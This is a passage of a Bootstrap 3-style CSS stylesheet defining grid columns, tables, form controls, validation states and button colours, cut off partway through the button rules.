.blockquote-reverse .small:before, blockquote.pull-right .small:before { content: ''; } .blockquote-reverse footer:after, blockquote.pull-right footer:after, .blockquote-reverse small:after, blockquote.pull-right small:after, .blockquote-reverse .small:after, blockquote.pull-right .small:after { content: '\00A0 \2014'; } blockquote:before, blockquote:after { content: ""; } address { margin-bottom: 20px; font-style: normal; line-height: 1.428571429; } code, kbd, pre, samp { font-family: Menlo, Monaco, Consolas, "Courier New", monospace; } code { padding: 2px 4px; font-size: 90%; color: #c7254e; white-space: nowrap; background-color: #f9f2f4; border-radius: 4px; } kbd { padding: 2px 4px; font-size: 90%; color: #fff; background-color: #333; border-radius: 3px; box-shadow: inset 0 -1px 0 rgba(0, 0, 0, .25); } pre { display: block; padding: 9.5px; margin: 0 0 10px; font-size: 13px; line-height: 1.428571429; color: #333; word-break: break-all; word-wrap: break-word; background-color: #f5f5f5; border: 1px solid #ccc; border-radius: 4px; } pre code { padding: 0; font-size: inherit; color: inherit; white-space: pre-wrap; background-color: transparent; border-radius: 0; } .pre-scrollable { max-height: 340px; overflow-y: scroll; } .container { padding-right: 15px; padding-left: 15px; margin-right: auto; margin-left: auto; } @media (min-width: 768px) { .container { width: 750px; } } @media (min-width: 992px) { .container { width: 970px; } } @media (min-width: 1200px) { .container { width: 1170px; } } .container-fluid { padding-right: 15px; padding-left: 15px; margin-right: auto; margin-left: auto; } .row { margin-right: -15px; margin-left: -15px; } .col-xs-1, .col-sm-1, .col-md-1, .col-lg-1, .col-xs-2, .col-sm-2, .col-md-2, .col-lg-2, .col-xs-3, .col-sm-3, .col-md-3, .col-lg-3, .col-xs-4, .col-sm-4, .col-md-4, .col-lg-4, .col-xs-5, .col-sm-5, .col-md-5, .col-lg-5, .col-xs-6, .col-sm-6, .col-md-6, .col-lg-6, .col-xs-7, .col-sm-7, .col-md-7, .col-lg-7, .col-xs-8, .col-sm-8, .col-md-8, .col-lg-8, .col-xs-9, .col-sm-9, .col-md-9, .col-lg-9, .col-xs-10, .col-sm-10, .col-md-10, .col-lg-10, .col-xs-11, .col-sm-11, .col-md-11, .col-lg-11, .col-xs-12, .col-sm-12, .col-md-12, .col-lg-12 { position: relative; min-height: 1px; padding-right: 15px; padding-left: 15px; } .col-xs-1, .col-xs-2, .col-xs-3, .col-xs-4, .col-xs-5, .col-xs-6, .col-xs-7, .col-xs-8, .col-xs-9, .col-xs-10, .col-xs-11, .col-xs-12 { float: left; } .col-xs-12 { width: 100%; } .col-xs-11 { width: 91.66666666666666%; } .col-xs-10 { width: 83.33333333333334%; } .col-xs-9 { width: 75%; } .col-xs-8 { width: 66.66666666666666%; } .col-xs-7 { width: 58.333333333333336%; } .col-xs-6 { width: 50%; } .col-xs-5 { width: 41.66666666666667%; } .col-xs-4 { width: 33.33333333333333%; } .col-xs-3 { width: 25%; } .col-xs-2 { width: 16.666666666666664%; } .col-xs-1 { width: 8.333333333333332%; } .col-xs-pull-12 { right: 100%; } .col-xs-pull-11 { right: 91.66666666666666%; } .col-xs-pull-10 { right: 83.33333333333334%; } .col-xs-pull-9 { right: 75%; } .col-xs-pull-8 { right: 66.66666666666666%; } .col-xs-pull-7 { right: 58.333333333333336%; } .col-xs-pull-6 { right: 50%; } .col-xs-pull-5 { right: 41.66666666666667%; } .col-xs-pull-4 { right: 33.33333333333333%; } .col-xs-pull-3 { right: 25%; } .col-xs-pull-2 { right: 16.666666666666664%; } .col-xs-pull-1 { right: 8.333333333333332%; } .col-xs-pull-0 { right: 0; } .col-xs-push-12 { left: 100%; } .col-xs-push-11 { left: 91.66666666666666%; } .col-xs-push-10 { left: 83.33333333333334%; } .col-xs-push-9 { left: 75%; } .col-xs-push-8 { left: 66.66666666666666%; } .col-xs-push-7 { left: 58.333333333333336%; } .col-xs-push-6 { left: 50%; } .col-xs-push-5 { left: 41.66666666666667%; } .col-xs-push-4 { left: 33.33333333333333%; } .col-xs-push-3 { left: 25%; } .col-xs-push-2 { left: 16.666666666666664%; } .col-xs-push-1 { left: 8.333333333333332%; } .col-xs-push-0 { left: 0; } .col-xs-offset-12 { margin-left: 100%; } .col-xs-offset-11 { margin-left: 91.66666666666666%; } .col-xs-offset-10 { margin-left: 83.33333333333334%; } .col-xs-offset-9 { margin-left: 75%; } .col-xs-offset-8 { margin-left: 66.66666666666666%; } .col-xs-offset-7 { margin-left: 58.333333333333336%; } .col-xs-offset-6 { margin-left: 50%; } .col-xs-offset-5 { margin-left: 41.66666666666667%; } .col-xs-offset-4 { margin-left: 33.33333333333333%; } .col-xs-offset-3 { margin-left: 25%; } .col-xs-offset-2 { margin-left: 16.666666666666664%; } .col-xs-offset-1 { margin-left: 8.333333333333332%; } .col-xs-offset-0 { margin-left: 0; } @media (min-width: 768px) { .col-sm-1, .col-sm-2, .col-sm-3, .col-sm-4, .col-sm-5, .col-sm-6, .col-sm-7, .col-sm-8, .col-sm-9, .col-sm-10, .col-sm-11, .col-sm-12 { float: left; } .col-sm-12 { width: 100%; } .col-sm-11 { width: 91.66666666666666%; } .col-sm-10 { width: 83.33333333333334%; } .col-sm-9 { width: 75%; } .col-sm-8 { width: 66.66666666666666%; } .col-sm-7 { width: 58.333333333333336%; } .col-sm-6 { width: 50%; } .col-sm-5 { width: 41.66666666666667%; } .col-sm-4 { width: 33.33333333333333%; } .col-sm-3 { width: 25%; } .col-sm-2 { width: 16.666666666666664%; } .col-sm-1 { width: 8.333333333333332%; } .col-sm-pull-12 { right: 100%; } .col-sm-pull-11 { right: 91.66666666666666%; } .col-sm-pull-10 { right: 83.33333333333334%; } .col-sm-pull-9 { right: 75%; } .col-sm-pull-8 { right: 66.66666666666666%; } .col-sm-pull-7 { right: 58.333333333333336%; } .col-sm-pull-6 { right: 50%; } .col-sm-pull-5 { right: 41.66666666666667%; } .col-sm-pull-4 { right: 33.33333333333333%; } .col-sm-pull-3 { right: 25%; } .col-sm-pull-2 { right: 16.666666666666664%; } .col-sm-pull-1 { right: 8.333333333333332%; } .col-sm-pull-0 { right: 0; } .col-sm-push-12 { left: 100%; } .col-sm-push-11 { left: 91.66666666666666%; } .col-sm-push-10 { left: 83.33333333333334%; } .col-sm-push-9 { left: 75%; } .col-sm-push-8 { left: 66.66666666666666%; } .col-sm-push-7 { left: 58.333333333333336%; } .col-sm-push-6 { left: 50%; } .col-sm-push-5 { left: 41.66666666666667%; } .col-sm-push-4 { left: 33.33333333333333%; } .col-sm-push-3 { left: 25%; } .col-sm-push-2 { left: 16.666666666666664%; } .col-sm-push-1 { left: 8.333333333333332%; } .col-sm-push-0 { left: 0; } .col-sm-offset-12 { margin-left: 100%; } .col-sm-offset-11 { margin-left: 91.66666666666666%; } .col-sm-offset-10 { margin-left: 83.33333333333334%; } .col-sm-offset-9 { margin-left: 75%; } .col-sm-offset-8 { margin-left: 66.66666666666666%; } .col-sm-offset-7 { margin-left: 58.333333333333336%; } .col-sm-offset-6 { margin-left: 50%; } .col-sm-offset-5 { margin-left: 41.66666666666667%; } .col-sm-offset-4 { margin-left: 33.33333333333333%; } .col-sm-offset-3 { margin-left: 25%; } .col-sm-offset-2 { margin-left: 16.666666666666664%; } .col-sm-offset-1 { margin-left: 8.333333333333332%; } .col-sm-offset-0 { margin-left: 0; } } @media (min-width: 992px) { .col-md-1, .col-md-2, .col-md-3, .col-md-4, .col-md-5, .col-md-6, .col-md-7, .col-md-8, .col-md-9, .col-md-10, .col-md-11, .col-md-12 { float: left; } .col-md-12 { width: 100%; } .col-md-11 { width: 91.66666666666666%; } .col-md-10 { width: 83.33333333333334%; } .col-md-9 { width: 75%; } .col-md-8 { width: 66.66666666666666%; } .col-md-7 { width: 58.333333333333336%; } .col-md-6 { width: 50%; } .col-md-5 { width: 41.66666666666667%; } .col-md-4 { width: 33.33333333333333%; } .col-md-3 { width: 25%; } .col-md-2 { width: 16.666666666666664%; } .col-md-1 { width: 8.333333333333332%; } .col-md-pull-12 { right: 100%; } .col-md-pull-11 { right: 91.66666666666666%; } .col-md-pull-10 { right: 83.33333333333334%; } .col-md-pull-9 { right: 75%; } .col-md-pull-8 { right: 66.66666666666666%; } .col-md-pull-7 { right: 58.333333333333336%; } .col-md-pull-6 { right: 50%; } .col-md-pull-5 { right: 41.66666666666667%; } .col-md-pull-4 { right: 33.33333333333333%; } .col-md-pull-3 { right: 25%; } .col-md-pull-2 { right: 16.666666666666664%; } .col-md-pull-1 { right: 8.333333333333332%; } .col-md-pull-0 { right: 0; } .col-md-push-12 { left: 100%; } .col-md-push-11 { left: 91.66666666666666%; } .col-md-push-10 { left: 83.33333333333334%; } .col-md-push-9 { left: 75%; } .col-md-push-8 { left: 66.66666666666666%; } .col-md-push-7 { left: 58.333333333333336%; } .col-md-push-6 { left: 50%; } .col-md-push-5 { left: 41.66666666666667%; } .col-md-push-4 { left: 33.33333333333333%; } .col-md-push-3 { left: 25%; } .col-md-push-2 { left: 16.666666666666664%; } .col-md-push-1 { left: 8.333333333333332%; } .col-md-push-0 { left: 0; } .col-md-offset-12 { margin-left: 100%; } .col-md-offset-11 { margin-left: 91.66666666666666%; } .col-md-offset-10 { margin-left: 83.33333333333334%; } .col-md-offset-9 { margin-left: 75%; } .col-md-offset-8 { margin-left: 66.66666666666666%; } .col-md-offset-7 { margin-left: 58.333333333333336%; } .col-md-offset-6 { margin-left: 50%; } .col-md-offset-5 { margin-left: 41.66666666666667%; } .col-md-offset-4 { margin-left: 33.33333333333333%; } .col-md-offset-3 { margin-left: 25%; } .col-md-offset-2 { margin-left: 16.666666666666664%; } .col-md-offset-1 { margin-left: 8.333333333333332%; } .col-md-offset-0 { margin-left: 0; } } @media (min-width: 1200px) { .col-lg-1, .col-lg-2, .col-lg-3, .col-lg-4, .col-lg-5, .col-lg-6, .col-lg-7, .col-lg-8, .col-lg-9, .col-lg-10, .col-lg-11, .col-lg-12 { float: left; } .col-lg-12 { width: 100%; } .col-lg-11 { width: 91.66666666666666%; } .col-lg-10 { width: 83.33333333333334%; } .col-lg-9 { width: 75%; } .col-lg-8 { width: 66.66666666666666%; } .col-lg-7 { width: 58.333333333333336%; } .col-lg-6 { width: 50%; } .col-lg-5 { width: 41.66666666666667%; } .col-lg-4 { width: 33.33333333333333%; } .col-lg-3 { width: 25%; } .col-lg-2 { width: 16.666666666666664%; } .col-lg-1 { width: 8.333333333333332%; } .col-lg-pull-12 { right: 100%; } .col-lg-pull-11 { right: 91.66666666666666%; } .col-lg-pull-10 { right: 83.33333333333334%; } .col-lg-pull-9 { right: 75%; } .col-lg-pull-8 { right: 66.66666666666666%; } .col-lg-pull-7 { right: 58.333333333333336%; } .col-lg-pull-6 { right: 50%; } .col-lg-pull-5 { right: 41.66666666666667%; } .col-lg-pull-4 { right: 33.33333333333333%; } .col-lg-pull-3 { right: 25%; } .col-lg-pull-2 { right: 16.666666666666664%; } .col-lg-pull-1 { right: 8.333333333333332%; } .col-lg-pull-0 { right: 0; } .col-lg-push-12 { left: 100%; } .col-lg-push-11 { left: 91.66666666666666%; } .col-lg-push-10 { left: 83.33333333333334%; } .col-lg-push-9 { left: 75%; } .col-lg-push-8 { left: 66.66666666666666%; } .col-lg-push-7 { left: 58.333333333333336%; } .col-lg-push-6 { left: 50%; } .col-lg-push-5 { left: 41.66666666666667%; } .col-lg-push-4 { left: 33.33333333333333%; } .col-lg-push-3 { left: 25%; } .col-lg-push-2 { left: 16.666666666666664%; } .col-lg-push-1 { left: 8.333333333333332%; } .col-lg-push-0 { left: 0; } .col-lg-offset-12 { margin-left: 100%; } .col-lg-offset-11 { margin-left: 91.66666666666666%; } .col-lg-offset-10 { margin-left: 83.33333333333334%; } .col-lg-offset-9 { margin-left: 75%; } .col-lg-offset-8 { margin-left: 66.66666666666666%; } .col-lg-offset-7 { margin-left: 58.333333333333336%; } .col-lg-offset-6 { margin-left: 50%; } .col-lg-offset-5 { margin-left: 41.66666666666667%; } .col-lg-offset-4 { margin-left: 33.33333333333333%; } .col-lg-offset-3 { margin-left: 25%; } .col-lg-offset-2 { margin-left: 16.666666666666664%; } .col-lg-offset-1 { margin-left: 8.333333333333332%; } .col-lg-offset-0 { margin-left: 0; } } table { max-width: 100%; background-color: transparent; } th { text-align: left; } .table { width: 100%; margin-bottom: 20px; } .table > thead > tr > th, .table > tbody > tr > th, .table > tfoot > tr > th, .table > thead > tr > td, .table > tbody > tr > td, .table > tfoot > tr > td { padding: 8px; line-height: 1.428571429; vertical-align: top; border-top: 1px solid #ddd; } .table > thead > tr > th { vertical-align: bottom; border-bottom: 2px solid #ddd; } .table > caption + thead > tr:first-child > th, .table > colgroup + thead > tr:first-child > th, .table > thead:first-child > tr:first-child > th, .table > caption + thead > tr:first-child > td, .table > colgroup + thead > tr:first-child > td, .table > thead:first-child > tr:first-child > td { border-top: 0; border-bottom-color: #52B9E9; } .table > tbody + tbody { border-top: 2px solid #ddd; } .table .table { background-color: #fff; } .table-condensed > thead > tr > th, .table-condensed > tbody > tr > th, .table-condensed > tfoot > tr > th, .table-condensed > thead > tr > td, .table-condensed > tbody > tr > td, .table-condensed > tfoot > tr > td { padding: 5px; } .table-bordered { border: 1px solid #ddd; } .table-bordered > thead > tr > th, .table-bordered > tbody > tr > th, .table-bordered > tfoot > tr > th, .table-bordered > thead > tr > td, .table-bordered > tbody > tr > td, .table-bordered > tfoot > tr > td { border: 1px solid #ddd; } .table-bordered > thead > tr > th, .table-bordered > thead > tr > td { border-bottom-width: 2px; } .table-striped > tbody > tr:nth-child(odd) > td, .table-striped > tbody > tr:nth-child(odd) > th { background-color: #f9f9f9; } .table-hover > tbody > tr:hover > td, .table-hover > tbody > tr:hover > th { background-color: #f5f5f5; } table col[class*="col-"] { position: static; display: table-column; float: none; } table td[class*="col-"], table th[class*="col-"] { position: static; display: table-cell; float: none; } .table > thead > tr > td.active, .table > tbody > tr > td.active, .table > tfoot > tr > td.active, .table > thead > tr > th.active, .table > tbody > tr > th.active, .table > tfoot > tr > th.active, .table > thead > tr.active > td, .table > tbody > tr.active > td, .table > tfoot > tr.active > td, .table > thead > tr.active > th, .table > tbody > tr.active > th, .table > tfoot > tr.active > th { background-color: #f5f5f5; } .table-hover > tbody > tr > td.active:hover, .table-hover > tbody > tr > th.active:hover, .table-hover > tbody > tr.active:hover > td, .table-hover > tbody > tr.active:hover > th { background-color: #e8e8e8; } .table > thead > tr > td.success, .table > tbody > tr > td.success, .table > tfoot > tr > td.success, .table > thead > tr > th.success, .table > tbody > tr > th.success, .table > tfoot > tr > th.success, .table > thead > tr.success > td, .table > tbody > tr.success > td, .table > tfoot > tr.success > td, .table > thead > tr.success > th, .table > tbody > tr.success > th, .table > tfoot > tr.success > th { background-color: #dff0d8; } .table-hover > tbody > tr > td.success:hover, .table-hover > tbody > tr > th.success:hover, .table-hover > tbody > tr.success:hover > td, .table-hover > tbody > tr.success:hover > th { background-color: #d0e9c6; } .table > thead > tr > td.info, .table > tbody > tr > td.info, .table > tfoot > tr > td.info, .table > thead > tr > th.info, .table > tbody > tr > th.info, .table > tfoot > tr > th.info, .table > thead > tr.info > td, .table > tbody > tr.info > td, .table > tfoot > tr.info > td, .table > thead > tr.info > th, .table > tbody > tr.info > th, .table > tfoot > tr.info > th { background-color: #d9edf7; } .table-hover > tbody > tr > td.info:hover, .table-hover > tbody > tr > th.info:hover, .table-hover > tbody > tr.info:hover > td, .table-hover > tbody > tr.info:hover > th { background-color: #c4e3f3; } .table > thead > tr > td.warning, .table > tbody > tr > td.warning, .table > tfoot > tr > td.warning, .table > thead > tr > th.warning, .table > tbody > tr > th.warning, .table > tfoot > tr > th.warning, .table > thead > tr.warning > td, .table > tbody > tr.warning > td, .table > tfoot > tr.warning > td, .table > thead > tr.warning > th, .table > tbody > tr.warning > th, .table > tfoot > tr.warning > th { background-color: #fcf8e3; } .table-hover > tbody > tr > td.warning:hover, .table-hover > tbody > tr > th.warning:hover, .table-hover > tbody > tr.warning:hover > td, .table-hover > tbody > tr.warning:hover > th { background-color: #faf2cc; } .table > thead > tr > td.danger, .table > tbody > tr > td.danger, .table > tfoot > tr > td.danger, .table > thead > tr > th.danger, .table > tbody > tr > th.danger, .table > tfoot > tr > th.danger, .table > thead > tr.danger > td, .table > tbody > tr.danger > td, .table > tfoot > tr.danger > td, .table > thead > tr.danger > th, .table > tbody > tr.danger > th, .table > tfoot > tr.danger > th { background-color: #f2dede; } .table-hover > tbody > tr > td.danger:hover, .table-hover > tbody > tr > th.danger:hover, .table-hover > tbody > tr.danger:hover > td, .table-hover > tbody > tr.danger:hover > th { background-color: #ebcccc; } @media (max-width: 767px) { .table-responsive { width: 100%; margin-bottom: 15px; overflow-x: scroll; overflow-y: hidden; -webkit-overflow-scrolling: touch; -ms-overflow-style: -ms-autohiding-scrollbar; border: 1px solid #ddd; } .table-responsive > .table { margin-bottom: 0; } .table-responsive > .table > thead > tr > th, .table-responsive > .table > tbody > tr > th, .table-responsive > .table > tfoot > tr > th, .table-responsive > .table > thead > tr > td, .table-responsive > .table > tbody > tr > td, .table-responsive > .table > tfoot > tr > td { white-space: nowrap; } .table-responsive > .table-bordered { border: 0; } .table-responsive > .table-bordered > thead > tr > th:first-child, .table-responsive > .table-bordered > tbody > tr > th:first-child, .table-responsive > .table-bordered > tfoot > tr > th:first-child, .table-responsive > .table-bordered > thead > tr > td:first-child, .table-responsive > .table-bordered > tbody > tr > td:first-child, .table-responsive > .table-bordered > tfoot > tr > td:first-child { border-left: 0; } .table-responsive > .table-bordered > thead > tr > th:last-child, .table-responsive > .table-bordered > tbody > tr > th:last-child, .table-responsive > .table-bordered > tfoot > tr > th:last-child, .table-responsive > .table-bordered > thead > tr > td:last-child, .table-responsive > .table-bordered > tbody > tr > td:last-child, .table-responsive > .table-bordered > tfoot > tr > td:last-child { border-right: 0; } .table-responsive > .table-bordered > tbody > tr:last-child > th, .table-responsive > .table-bordered > tfoot > tr:last-child > th, .table-responsive > .table-bordered > tbody > tr:last-child > td, .table-responsive > .table-bordered > tfoot > tr:last-child > td { border-bottom: 0; } } fieldset { min-width: 0; padding: 0; margin: 0; border: 0; } legend { display: block; width: 100%; padding: 0; margin-bottom: 20px; font-size: 21px; line-height: inherit; color: #333; border: 0; border-bottom: 1px solid #e5e5e5; } label { display: inline-block; margin-bottom: 5px; font-weight: bold; } input[type="search"] { -webkit-box-sizing: border-box; -moz-box-sizing: border-box; box-sizing: border-box; } input[type="radio"], input[type="checkbox"] { margin: 4px 0 0; margin-top: 1px \9; /* IE8-9 */ line-height: normal; } input[type="file"] { display: block; } input[type="range"] { display: block; width: 100%; } select[multiple], select[size] { height: auto; } input[type="file"]:focus, input[type="radio"]:focus, input[type="checkbox"]:focus { outline: thin dotted; outline: 5px auto -webkit-focus-ring-color; outline-offset: -2px; } output { display: block; padding-top: 7px; font-size: 14px; line-height: 1.428571429; color: #555; } .form-control { display: block; width: 100%; height: 34px; padding: 6px 12px; font-size: 14px; line-height: 1.428571429; color: #555; background-color: #fff; background-image: none; border: 1px solid #ccc; border-radius: 4px; -webkit-box-shadow: inset 0 1px 1px rgba(0, 0, 0, .075); box-shadow: inset 0 1px 1px rgba(0, 0, 0, .075); -webkit-transition: border-color ease-in-out .15s, box-shadow ease-in-out .15s; transition: border-color ease-in-out .15s, box-shadow ease-in-out .15s; } .form-control:focus { border-color: #66afe9; outline: 0; -webkit-box-shadow: inset 0 1px 1px rgba(0,0,0,.075), 0 0 8px rgba(102, 175, 233, .6); box-shadow: inset 0 1px 1px rgba(0,0,0,.075), 0 0 8px rgba(102, 175, 233, .6); } .form-control:-moz-placeholder { color: #999; } .form-control::-moz-placeholder { color: #999; opacity: 1; } .form-control:-ms-input-placeholder { color: #999; } .form-control::-webkit-input-placeholder { color: #999; } .form-control[disabled], .form-control[readonly], fieldset[disabled] .form-control { cursor: not-allowed; background-color: #eee; opacity: 1; } textarea.form-control { height: auto; } input[type="date"] { line-height: 34px; } .form-group { margin-bottom: 15px; } .radio, .checkbox { display: block; min-height: 20px; padding-left: 20px; margin-top: 10px; margin-bottom: 10px; } .radio label, .checkbox label { display: inline; font-weight: normal; cursor: pointer; } .radio input[type="radio"], .radio-inline input[type="radio"], .checkbox input[type="checkbox"], .checkbox-inline input[type="checkbox"] { float: left; margin-left: -20px; } .radio + .radio, .checkbox + .checkbox { margin-top: -5px; } .radio-inline, .checkbox-inline { display: inline-block; padding-left: 20px; margin-bottom: 0; font-weight: normal; vertical-align: middle; cursor: pointer; } .radio-inline + .radio-inline, .checkbox-inline + .checkbox-inline { margin-top: 0; margin-left: 10px; } input[type="radio"][disabled], input[type="checkbox"][disabled], .radio[disabled], .radio-inline[disabled], .checkbox[disabled], .checkbox-inline[disabled], fieldset[disabled] input[type="radio"], fieldset[disabled] input[type="checkbox"], fieldset[disabled] .radio, fieldset[disabled] .radio-inline, fieldset[disabled] .checkbox, fieldset[disabled] .checkbox-inline { cursor: not-allowed; } .input-sm { height: 30px; padding: 5px 10px; font-size: 12px; line-height: 1.5; border-radius: 3px; } select.input-sm { height: 30px; line-height: 30px; } textarea.input-sm, select[multiple].input-sm { height: auto; } .input-lg { height: 46px; padding: 10px 16px; font-size: 18px; line-height: 1.33; border-radius: 6px; } select.input-lg { height: 46px; line-height: 46px; } textarea.input-lg, select[multiple].input-lg { height: auto; } .has-feedback { position: relative; } .has-feedback .form-control { padding-right: 42.5px; } .has-feedback .form-control-feedback { position: absolute; top: 25px; right: 0; display: block; width: 34px; height: 34px; line-height: 34px; text-align: center; } .has-success .help-block, .has-success .control-label, .has-success .radio, .has-success .checkbox, .has-success .radio-inline, .has-success .checkbox-inline { color: #3c763d; } .has-success .form-control { border-color: #3c763d; -webkit-box-shadow: inset 0 1px 1px rgba(0, 0, 0, .075); box-shadow: inset 0 1px 1px rgba(0, 0, 0, .075); } .has-success .form-control:focus { border-color: #2b542c; -webkit-box-shadow: inset 0 1px 1px rgba(0, 0, 0, .075), 0 0 6px #67b168; box-shadow: inset 0 1px 1px rgba(0, 0, 0, .075), 0 0 6px #67b168; } .has-success .input-group-addon { color: #3c763d; background-color: #dff0d8; border-color: #3c763d; } .has-success .form-control-feedback { color: #3c763d; } .has-warning .help-block, .has-warning .control-label, .has-warning .radio, .has-warning .checkbox, .has-warning .radio-inline, .has-warning .checkbox-inline { color: #8a6d3b; } .has-warning .form-control { border-color: #8a6d3b; -webkit-box-shadow: inset 0 1px 1px rgba(0, 0, 0, .075); box-shadow: inset 0 1px 1px rgba(0, 0, 0, .075); } .has-warning .form-control:focus { border-color: #66512c; -webkit-box-shadow: inset 0 1px 1px rgba(0, 0, 0, .075), 0 0 6px #c0a16b; box-shadow: inset 0 1px 1px rgba(0, 0, 0, .075), 0 0 6px #c0a16b; } .has-warning .input-group-addon { color: #8a6d3b; background-color: #fcf8e3; border-color: #8a6d3b; } .has-warning .form-control-feedback { color: #8a6d3b; } .has-error .help-block, .has-error .control-label, .has-error .radio, .has-error .checkbox, .has-error .radio-inline, .has-error .checkbox-inline { color: #a94442; } .has-error .form-control { border-color: #a94442; -webkit-box-shadow: inset 0 1px 1px rgba(0, 0, 0, .075); box-shadow: inset 0 1px 1px rgba(0, 0, 0, .075); } .has-error .form-control:focus { border-color: #843534; -webkit-box-shadow: inset 0 1px 1px rgba(0, 0, 0, .075), 0 0 6px #ce8483; box-shadow: inset 0 1px 1px rgba(0, 0, 0, .075), 0 0 6px #ce8483; } .has-error .input-group-addon { color: #a94442; background-color: #f2dede; border-color: #a94442; } .has-error .form-control-feedback { color: #a94442; } .form-control-static { margin-bottom: 0; } .help-block { display: block; margin-top: 5px; margin-bottom: 10px; color: #737373; } @media (min-width: 768px) { .form-inline .form-group { display: inline-block; margin-bottom: 0; vertical-align: middle; } .form-inline .form-control { display: inline-block; width: auto; vertical-align: middle; } .form-inline .control-label { margin-bottom: 0; vertical-align: middle; } .form-inline .radio, .form-inline .checkbox { display: inline-block; padding-left: 0; margin-top: 0; margin-bottom: 0; vertical-align: middle; } .form-inline .radio input[type="radio"], .form-inline .checkbox input[type="checkbox"] { float: none; margin-left: 0; } .form-inline .has-feedback .form-control-feedback { top: 0; } } .form-horizontal .control-label, .form-horizontal .radio, .form-horizontal .checkbox, .form-horizontal .radio-inline, .form-horizontal .checkbox-inline { padding-top: 7px; margin-top: 0; margin-bottom: 0; } .form-horizontal .radio, .form-horizontal .checkbox { min-height: 27px; } .form-horizontal .form-group { margin-right: -15px; margin-left: -15px; } .form-horizontal .form-control-static { padding-top: 7px; } @media (min-width: 768px) { .form-horizontal .control-label { text-align: right; } } .form-horizontal .has-feedback .form-control-feedback { top: 0; right: 15px; } .btn { display: inline-block; padding: 6px 12px; margin-bottom: 0; font-size: 14px; font-weight: normal; line-height: 1.428571429; text-align: center; white-space: nowrap; vertical-align: middle; cursor: pointer; -webkit-user-select: none; -moz-user-select: none; -ms-user-select: none; -o-user-select: none; user-select: none; background-image: none; border: 1px solid transparent; border-radius: 4px; } .btn:focus { outline: thin dotted; outline: 5px auto -webkit-focus-ring-color; outline-offset: -2px; } .btn:hover, .btn:focus { color: #333; text-decoration: none; } .btn:active, .btn.active { background-image: none; outline: 0; -webkit-box-shadow: inset 0 3px 5px rgba(0, 0, 0, .125); box-shadow: inset 0 3px 5px rgba(0, 0, 0, .125); } .btn.disabled, .btn[disabled], fieldset[disabled] .btn { pointer-events: none; cursor: not-allowed; filter: alpha(opacity=65); -webkit-box-shadow: none; box-shadow: none; opacity: .65; } .btn-default { color: #333; background-color: #fff; border-color: #ccc; } .btn-default:hover, .btn-default:focus, .btn-default:active, .btn-default.active, .open .dropdown-toggle.btn-default { color: #333; background-color: #ebebeb; border-color: #adadad; } .btn-default:active, .btn-default.active, .open .dropdown-toggle.btn-default { background-image: none; } .btn-default.disabled, .btn-default[disabled], fieldset[disabled] .btn-default, .btn-default.disabled:hover, .btn-default[disabled]:hover, fieldset[disabled] .btn-default:hover, .btn-default.disabled:focus, .btn-default[disabled]:focus, fieldset[disabled] .btn-default:focus, .btn-default.disabled:active, .btn-default[disabled]:active, fieldset[disabled] .btn-default:active, .btn-default.disabled.active, .btn-default[disabled].active, fieldset[disabled] .btn-default.active { background-color: #fff; border-color: #ccc; } .btn-default .badge { color: #fff; background-color: #333; } .btn-primary { color: #fff; background-color: #428bca; border-color: #357ebd; } .btn-primary:hover, .btn-primary:focus, .btn-primary:active, .btn-primary.active, .open .dropdown-toggle.btn-primary { color: #fff; background-color: #3276b1; border-color: #285e8e; } .btn-primary:active, .btn-primary.active, .open .dropdown-toggle.btn-primary { background-image: none; } .btn-primary.disabled, .btn-primary[disabled], fieldset[disabled] .btn-primary, .btn-primary.disabled:hover, .btn-primary[disabled]:hover, fieldset[disabled] .btn-primary:hover, .btn-primary.disabled:focus, .btn-primary[disabled]:focus, fieldset[disabled] .btn-primary:focus, .btn-primary.disabled:active, .btn-primary[disabled]:active, fieldset[disabled] .btn-primary:active, .btn-primary.disabled.active, .btn-primary[disabled].active, fieldset[disabled] .btn-primary.active { background-color: #428bca; border-color: #357ebd; } .btn-primary .badge { color: #428bca; background-color: #fff; } .btn-success { color: #fff; background-color: #5cb85c; border-color: #4cae4c; } .btn-success:hover, .btn-success:focus, .btn-success:active, .btn-success.active, .open .dropdown-toggle.btn-success { color: #fff; background-color: #47a447; border-color: #398439; } .btn-success:active, .btn-success.active, .open .dropdown-toggle.btn-success { background-image: none; } .btn-success.disabled, .btn-success[disabled], fieldset[disabled] .btn-success, .btn-success.disabled:hover, .btn-success[disabled]:hover, fieldset[disabled] .btn-success:hover, .btn-success.disabled:focus, .btn-success[disabled]:focus, fieldset[disabled] .btn-success:focus, .btn-success.disabled:active, .btn-success[disabled]:active, fieldset[disabled] .btn-success:active, .btn-success.disabled.active, .btn-success[disabled].active, fieldset[disabled] .btn-success.active { background-color: #5cb85c; border-color: #4cae4c; } .btn-success .badge { color: #5cb85c; background-color: #fff; } .btn-info { color: #fff; background-color: #5bc0de; border-color: #46b8da; } .btn-info:hover, .btn-info:focus, .btn-info:active, .btn-info.active, .open .dropdown-toggle.btn-info { color: #fff; background-color: #39b3d7; border-color: #269abc; } .btn-info:active, .btn-info.active, .open .dropdown-toggle.btn-info { background-image: none; } .btn-info.disabled, .btn-info[disabled], fieldset[disabled] .btn-info, .btn-info.disabled:hover, .btn-info[disabled]:hover, fieldset[disabled] .btn-info:hover, .btn-info.disabled:focus, .btn-info[disabled]:focus, fieldset[disabled] .btn-info:focus, .btn-info.disabled:active, .btn-info[disabled]:active, fieldset[disabled] .btn-info:active, .btn-info.disabled.active, .btn-info[disabled].active, fieldset[disabled] .btn-info.active { background-color: #5bc0de; border-color: #46b8da; } .btn-info .badge { color: #5bc0de; background-color: #fff; } .btn-warning { color: #fff; background-color: #f0ad4e; border-color: #eea236; } .btn-warning:hover, .btn-warning:focus, .btn-warning:active, .btn-warning.active, .open .dropdown-toggle.btn-warning { color: #fff; background-color: #ed9c28; border-color: #d58512; } .btn-warning:active, .btn-warning.active, .open .dropdown-toggle.btn-warning { background-image: none; } .btn-warning.disabled, .btn-warning[disabled], fieldset[disabled] .btn-warning, .btn-warning.disabled:hover, .btn-warning[disabled]:hover, fieldset[disabled] .btn-warning:hover, .btn-warning.disabled:focus, .btn-warning[disabled]:focus, fieldset[disabled] .btn-warning:focus, .btn-warning.disabled:active, .btn-warning[disabled]:active, fieldset[disabled] .btn-warning:active, .btn-warning.disabled.active, .btn-warning[disabled].active, fieldset[disabled] .btn-warning.active { background-color: #f0ad4e; border-color: #eea236; } .btn-warning .badge { color: #f0ad4e; background-color: #fff; } .btn-danger { color: #fff; background-color: #d9534f; border-color: #d43f3a; } .btn-danger:hover, .btn-danger:focus, .btn-danger:active, .btn-danger.active, .open .dropdown-toggle.btn-danger { color: #fff; background-color: #d2322d; border-color: #ac2925; } .btn-danger:active, 